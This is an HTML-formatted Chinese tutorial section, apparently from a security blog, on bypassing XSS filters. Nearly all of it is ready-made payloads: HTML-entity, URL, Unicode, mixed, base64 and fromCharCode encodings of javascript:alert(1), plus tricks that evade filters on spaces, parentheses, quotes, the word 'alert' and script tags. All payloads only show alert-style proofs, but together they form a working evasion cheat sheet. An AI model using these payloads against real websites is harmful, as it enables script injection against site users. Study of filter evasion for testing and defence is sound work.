<h2 id="五、xss-常见绕过"><a href="#五、xss-常见绕过" class="headerlink" title="五、xss 常见绕过"></a>五、xss 常见绕过</h2><h2 id="1、编码绕过"><a href="#1、编码绕过" class="headerlink" title="1、编码绕过"></a>1、编码绕过</h2><p>浏览器对 XSS 代码的解析顺序为：**HTML解码 —— URL解码 —— JS解码(只支持UNICODE)**。</p>
<h3 id="0x01-html-实体编码"><a href="#0x01-html-实体编码" class="headerlink" title="0x01. html 实体编码"></a>0x01. html 实体编码</h3><p><strong>当可控点为单个标签属性时，可以使用 html 实体编码。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;可控点&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;可控点&quot;&gt;test&lt;iframe&gt;</span><br><span class="line">&lt;img src=x onerror=&quot;可控点&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Payload</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>十进制</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#49;&amp;#41;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>十六进制</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>可以不带分号</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3a&amp;#x61&amp;#x6c&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x31&amp;#x29&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>可以填充0</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x006a&amp;#x0061&amp;#x0076&amp;#x0061&amp;#x0073&amp;#x0063&amp;#x0072&amp;#x0069&amp;#x0070&amp;#x0074&amp;#x003a&amp;#x0061&amp;#x006c&amp;#x0065&amp;#x0072&amp;#x0074&amp;#x0028&amp;#x0031&amp;#x0029&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x02-url-编码"><a href="#0x02-url-编码" class="headerlink" title="0x02. url 编码"></a>0x02. url 编码</h3><p><strong>当注入点存在 href 或者 src 属性时，可以使用 url 编码。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;可控点&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;可控点&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Payload</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:alert(1)&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p><strong>注：url 解析过程中，不能对协议类型进行任何的编码操作，所以 javascript: 协议头需要保留。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:%61%6c%65%72%74%28%31%29&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:%61%6c%65%72%74%28%31%29&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<p><strong>可以二次编码</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:%2561%256c%2565%2572%2574%2528%2531%2529&quot;&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;iframe src=&quot;javascript:%2561%256c%2565%2572%2574%2528%2531%2529&quot;&gt;test&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x03-js-编码"><a href="#0x03-js-编码" class="headerlink" title="0x03. js 编码"></a>0x03. js 编码</h3><p><strong>解析的时候字符或者字符串仅会被解码为字符串文本或者标识符名称，例如 js 解析器工作的时候将<code>\u0061\u006c\u0065\u0072\u0074</code>进行解码后为<code>alert</code>，而<code>alert</code>是一个有效的标识符名称，它是能被正常解析的。但是像圆括号、双引号、单引号等等这些字符就只能被当作普通的文本，从而导致无法执行。</strong></p>
<p><strong>由于 js 是最后进行解析的，所以如果混合编码，需要先使用 js 编码再进行 url 编码或者 html 实体编码。</strong></p>
<p><strong>js 编码策略：</strong></p>
<ol>
<li>“&quot; 加上三个八进制数字，如果个数不够，前面补0，例如 “&lt;” 编码为 “\074”</li>
<li>“\x” 加上两个十六进制数字，如果个数不够，前面补0，例如 “&lt;” 编码为 “\x3c”</li>
<li>“\u” 加上四个十六进制数字，如果个数不够，前面补0，例如 “&lt;” 编码为 “\u003c”</li>
<li>对于一些控制字符，使用特殊的 C 类型的转义风格（例如 \n 和 \r）</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;可控点&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;input onfocus=location=&quot;可控点&quot; autofocus&gt; </span><br></pre></td></tr></table></figure>

<p><strong>Payload</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;alert(1)&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;input onfocus=location=&quot;alert(1)&quot; autofocus&gt; </span><br></pre></td></tr></table></figure>

<p><strong>Unicode 编码</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;\u0061\u006c\u0065\u0072\u0074(1)&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;input onfocus=location=&quot;javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029&quot; autofocus&gt; </span><br></pre></td></tr></table></figure>

<p><strong>注：</strong></p>
<p><strong>Unicode 编码时，只能对有效的标识符进行编码，否则非标识符解码后不能解析执行。例如 javascript:alert(1) ，进行 Unicode 编码时，只能对 alert 和 “1” 进行编码，框号编码后会被当成文本字符，不能执行。****ascii 八进制和十六进制编码使用时需要 eval、setTimeout等函数传递变量，并且可以对整个传递参数进行编码。例如 eval(“alert(1)”)，可以对 “alert(1)” 整个进行八进制、十六进制或者 Unicode 编码(双引号不参与)。</strong></p>
<p><strong>八进制和十六进制</strong></p>
<p>setTimeout() 是属于 window 的方法，该方法用于在指定的毫秒数后调用函数或计算表达式。</p>
<p>语法：<code>setTimeout(要执行的代码, 等待的毫秒数)</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">setTimeout(JavaScript 函数, 等待的毫秒数)</span><br><span class="line">1.&lt;svg/onload=setTimeout(&#x27;\x61\x6C\x65\x72\x74\x28\x31\x29&#x27;)&gt;</span><br><span class="line">2.&lt;svg/onload=setTimeout(&#x27;\141\154\145\162\164\050\061\051&#x27;)&gt;</span><br><span class="line">3.&lt;svg/onload=setTimeout(&#x27;\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029&#x27;)&gt;</span><br><span class="line">4.&lt;script&gt;eval(&quot;\x61\x6C\x65\x72\x74\x28\x31\x29&quot;)&lt;/script&gt;</span><br><span class="line">5.&lt;script&gt;eval(&quot;\141\154\145\162\164\050\061\051&quot;)&lt;/script&gt;</span><br><span class="line">6.&lt;script&gt;eval(&quot;\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029&quot;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x04-混合编码"><a href="#0x04-混合编码" class="headerlink" title="0x04. 混合编码"></a>0x04. 混合编码</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;可控点&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Payload</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>html 编码</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>Unicode 编码</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:\u0061\u006c\u0065\u0072\u0074(1)&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>注：Unicode 编码不能对括号使用</strong></p>
<p><strong>url 编码</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:%61%6c%65%72%74%28%31%29&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>由于浏览器对 xss 代码的解析过程是：html解析 —— url解析 —— js解析，所以可以编码方式进行组合绕过。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1. 原代码</span><br><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br><span class="line">2. 对alert进行JS编码（unicode编码）</span><br><span class="line">&lt;a href=&quot;javascript:\u0061\u006c\u0065\u0072\u0074(1)&quot;&gt;test&lt;/a&gt;</span><br><span class="line">3. 对href标签中的\u0061\u006c\u0065\u0072\u0074进行URL编码</span><br><span class="line">&lt;a href=&quot;javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)&quot;&gt;test&lt;/a&gt;</span><br><span class="line">4. 对href标签中的javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)进行HTML编码：</span><br><span class="line">&lt;a href=&quot;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x33;&amp;#x31;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x36;&amp;#x33;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x36;&amp;#x25;&amp;#x33;&amp;#x35;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x37;&amp;#x25;&amp;#x33;&amp;#x32;&amp;#x25;&amp;#x35;&amp;#x63;&amp;#x25;&amp;#x37;&amp;#x35;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x30;&amp;#x25;&amp;#x33;&amp;#x37;&amp;#x25;&amp;#x33;&amp;#x34;&amp;#x28;&amp;#x31;&amp;#x29;&quot;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>注：href、src等加载url的属性可以使用三种混合编码，on事件可以使用html实体编码和js编码混合，但url编码在on事件中不会解析。</strong></p>
<h3 id="0x05-base64-编码"><a href="#0x05-base64-编码" class="headerlink" title="0x05. base64 编码"></a>0x05. base64 编码</h3><p><strong>base64 编码通常需要使用到 data 伪协议。</strong></p>
<p><strong>data 协议使用方法：<code>data:资源类型;编码,内容</code></strong></p>
<p>base64编码内容为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br><span class="line">PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=</span><br></pre></td></tr></table></figure>

<p>通常与 base64 编码配合 data 协议的标签有 <strong><object>、<a>、<iframe></strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.&lt;object&gt; 标签</span><br><span class="line">&lt;object data=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&quot;&gt;&lt;/object&gt;</span><br><span class="line">2.&lt;a&gt; 标签</span><br><span class="line">&lt;a href=&quot;data:text/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&quot;&gt;test&lt;/a&gt;   （新版浏览器不支持）</span><br><span class="line">3.&lt;iframe&gt; 标签</span><br><span class="line">&lt;iframe src=&quot;data:text/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">4.&lt;embed&gt; 标签</span><br><span class="line">&lt;embed src=&quot;data:text/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&quot;&gt;&lt;/embed&gt;</span><br></pre></td></tr></table></figure>

<p><strong>atob 函数</strong></p>
<p>atob() 方法用于解码使用 base-64 编码的字符串。</p>
<p>语法：<code>window.atob(encodedStr)</code>(encodedStr: 必需，是一个通过 btoa() 方法编码的字符串)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1.&lt;a href=javascript:eval(atob(&#x27;YWxlcnQoMSk=&#x27;))&gt;test&lt;/a&gt;</span><br><span class="line">2.&lt;a href=javascript:eval(window.atob(&#x27;YWxlcnQoMSk=&#x27;))&gt;test&lt;/a&gt;</span><br><span class="line">3.&lt;a href=javascript:eval(window[&#x27;atob&#x27;](&#x27;YWxlcnQoMSk=&#x27;))&gt;test&lt;/a&gt;</span><br><span class="line">4.&lt;img src=x onmouseover=&quot;eval(window.atob(&#x27;YWxlcnQoMSk=&#x27;))&quot;&gt;</span><br><span class="line">5.&lt;img src=x onerror=&quot;eval(atob(&#x27;YWxlcnQoMSk=&#x27;))&quot;&gt;</span><br><span class="line">6.&lt;iframe src=&quot;javascript:eval(window[&#x27;atob&#x27;](&#x27;YWxlcnQoMSk=&#x27;))&quot;&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x06-ascii-编码"><a href="#0x06-ascii-编码" class="headerlink" title="0x06. ascii 编码"></a>0x06. ascii 编码</h3><p>ascii 编码一般配合<code>String.fromCharCode</code>使用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">alert(1)</span><br><span class="line">十进制：97, 108, 101, 114, 116, 40, 49, 41</span><br><span class="line">十六进制：0x61, 0x6C, 0x65, 0x72, 0x74, 0x28, 0x31, 0x29</span><br></pre></td></tr></table></figure>

<p><strong>十进制</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&#x27;javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))&#x27;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<p><strong>十六进制</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&#x27;javascript:eval(String.fromCharCode(0x61, 0x6C, 0x65, 0x72, 0x74, 0x28, 0x31, 0x29))&#x27;&gt;test&lt;/a&gt;</span><br></pre></td></tr></table></figure>



<h2 id="2、空格过滤绕过"><a href="#2、空格过滤绕过" class="headerlink" title="2、空格过滤绕过"></a>2、空格过滤绕过</h2><html><img**AA**src**AA**onerror**BB**=**BB**alert**CC**(1)**DD**</html>

<p>A位置可填充 &#x2F;，&#x2F;123&#x2F;，%09，%0A，%0C，%0D，%20 B位置可填充 %09，%0A，%0C，%0D，%20 C位置可填充 %0B，&#x2F;**&#x2F;，如果加了双引号，则可以填充 %09，%0A，%0C，%0D，%20 D位置可填充 %09，%0A，%0C，%0D，%20，&#x2F;&#x2F;，&gt;</p>
<h2 id="3、圆括号过滤绕过"><a href="#3、圆括号过滤绕过" class="headerlink" title="3、圆括号过滤绕过"></a>3、圆括号过滤绕过</h2><h3 id="0x01-反引号替换"><a href="#0x01-反引号替换" class="headerlink" title="0x01. 反引号替换"></a>0x01. 反引号替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert`1`&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x02-throw-绕过"><a href="#0x02-throw-绕过" class="headerlink" title="0x02. throw 绕过"></a>0x02. throw 绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src onerror=&quot;javascript:window.onerror=alert;throw 1&quot;&gt;</span><br><span class="line">&lt;svg/onload=&quot;window.onerror=eval;throw&#x27;=alert\x281\x29&#x27;;&quot;&gt;</span><br></pre></td></tr></table></figure>



<h2 id="4、单引号过滤绕过"><a href="#4、单引号过滤绕过" class="headerlink" title="4、单引号过滤绕过"></a>4、单引号过滤绕过</h2><h3 id="0x01-斜杠替换"><a href="#0x01-斜杠替换" class="headerlink" title="0x01. 斜杠替换"></a>0x01. 斜杠替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x02-反引号替换"><a href="#0x02-反引号替换" class="headerlink" title="0x02. 反引号替换"></a>0x02. 反引号替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(`xss`)&lt;/script&gt;</span><br></pre></td></tr></table></figure>



<h2 id="5、alert-过滤绕过"><a href="#5、alert-过滤绕过" class="headerlink" title="5、alert 过滤绕过"></a>5、alert 过滤绕过</h2><h3 id="0x01-prompt-替换"><a href="#0x01-prompt-替换" class="headerlink" title="0x01. prompt 替换"></a>0x01. prompt 替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;prompt(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x02-confirm-替换"><a href="#0x02-confirm-替换" class="headerlink" title="0x02. confirm 替换"></a>0x02. confirm 替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;confirm(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x03-console-log-替换"><a href="#0x03-console-log-替换" class="headerlink" title="0x03. console.log 替换"></a>0x03. console.log 替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;console.log(3)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x04-document-write-替换"><a href="#0x04-document-write-替换" class="headerlink" title="0x04. document.write 替换"></a>0x04. document.write 替换</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;document.write(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x05-base64-绕过"><a href="#0x05-base64-绕过" class="headerlink" title="0x05. base64 绕过"></a>0x05. base64 绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;Function`a$&#123;atob`YWxlcnQoMSk=`&#125;```&quot;&gt;</span><br><span class="line">&lt;img src=x onerror=&quot;``.constructor.constructor`a$&#123;atob`YWxlcnQoMSk=`&#125;```&quot;&gt;</span><br></pre></td></tr></table></figure>



<h2 id="6、关键词置空绕过"><a href="#6、关键词置空绕过" class="headerlink" title="6、关键词置空绕过"></a>6、关键词置空绕过</h2><h3 id="0x01-大小写绕过"><a href="#0x01-大小写绕过" class="headerlink" title="0x01. 大小写绕过"></a>0x01. 大小写绕过</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>可以转换为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;ScRiPt&gt;AlErT(/xss/)&lt;/sCrIpT&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x02-嵌套绕过"><a href="#0x02-嵌套绕过" class="headerlink" title="0x02. 嵌套绕过"></a>0x02. 嵌套绕过</h3><p>嵌套<script>和</script>突破</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(/xss/)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>可以转换为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;sc&lt;script&gt;ript&gt;alert(/xss/)&lt;/sc&lt;/script&gt;ript&gt;</span><br></pre></td></tr></table></figure>



<h2 id="7、函数拼接"><a href="#7、函数拼接" class="headerlink" title="7、函数拼接"></a>7、函数拼接</h2><h3 id="0x01-eval"><a href="#0x01-eval" class="headerlink" title="0x01. eval"></a>0x01. eval</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;eval(&#x27;al&#x27;+&#x27;ert(1)&#x27;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x02-top"><a href="#0x02-top" class="headerlink" title="0x02. top"></a>0x02. top</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;top[&#x27;al&#x27;+&#x27;ert&#x27;](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x03-window"><a href="#0x03-window" class="headerlink" title="0x03. window"></a>0x03. window</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;window[&#x27;al&#x27;+&#x27;ert&#x27;](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x04-self"><a href="#0x04-self" class="headerlink" title="0x04. self"></a>0x04. self</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;self[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x05-parent"><a href="#0x05-parent" class="headerlink" title="0x05. parent"></a>0x05. parent</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;parent[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x06-frames"><a href="#0x06-frames" class="headerlink" title="0x06. frames"></a>0x06. frames</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;frames[`al`+`ert`](1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="0x07-常用函数"><a href="#0x07-常用函数" class="headerlink" title="0x07. 常用函数"></a>0x07. 常用函数</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;eval(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;open(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;document.write(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;setTimeout(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;setInterval(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;Set.constructor(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;Map.constructor(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;Array.constructor(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;WeakSet.constructor(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;constructor.constructor(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;[1].map(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;[1].find(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;[1].every(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;[1].filter(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;[1].forEach(alert(1))&quot;&gt;</span><br><span class="line">&lt;img src=&quot;x&quot; onerror=&quot;[1].findIndex(alert(1))&quot;&gt;</span><br></pre></td></tr></table></figure>



